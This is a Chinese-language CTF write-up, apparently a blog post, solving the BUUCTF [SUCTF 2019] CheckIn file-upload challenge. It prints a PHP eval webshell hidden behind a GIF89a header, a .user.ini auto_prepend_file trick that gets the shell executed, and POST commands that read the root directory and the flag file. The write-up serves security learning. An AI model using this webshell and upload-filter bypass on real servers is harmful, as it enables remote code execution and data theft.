web buuctf [SUCTF 2019]CheckIn1

如图,应该是一个文件上传的题目;

1.上传一句话木马:

上传php文件,提示illegal suffix!(非法后缀),改一下后缀,php3,phtml,Php都是一样的提示,应该是对文件后缀进行了过滤

改成jpg格式的提示exif_imagetype:not image!,后台函数进行了过滤

2.改文件头GIF89a?<script language="php">@eval($_POST[dd]);</script>

上传后提示

能够看到文件上传的路径,和文件所在位置里面的其他文件信息,除了上传文件,还有一个index.php文件,

但是到这一步,虽然上传成功的,但是上传的是Jpg文件,静态文件无法通过浏览器进行传参

3..user.ini文件   .user.ini文件构成的PHP后门 - phith0n 

.user.ini是php.ini文件的一种,是一个配置文件,这个配置文件的漏洞在于能够通过更改配置项,进而执行程序,php.ini中的一个配置项auto_prepend_file相当于require()函数,能够执行函数里面的php文件 ,这种配置文件的作用在于执行php文件时,会默认的先扫描该文件所在目录下的ini文件,

也就是将user.ini文件传到index.php所在的文件目录,然后甚至user.ini的配置项auto_prepend_file=oneq.jpg

上传.user.ini文件 
提示:exif_imagetype:not image!

忘了加文件头了

GIF89a?auto_prepend_file=oneq.jpg

上传成功

 4.上传的时候已经运行了index.php,也就是现在可以通过传参进行获取

用蚁剑链接前,先看看基础路径有没有,令dd=var_dump(scandir("/"));(扫描根目录文件) 

dd=var_dump(file_get_contents("/flag"));(打印flag内容)


 

 

  • 2
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值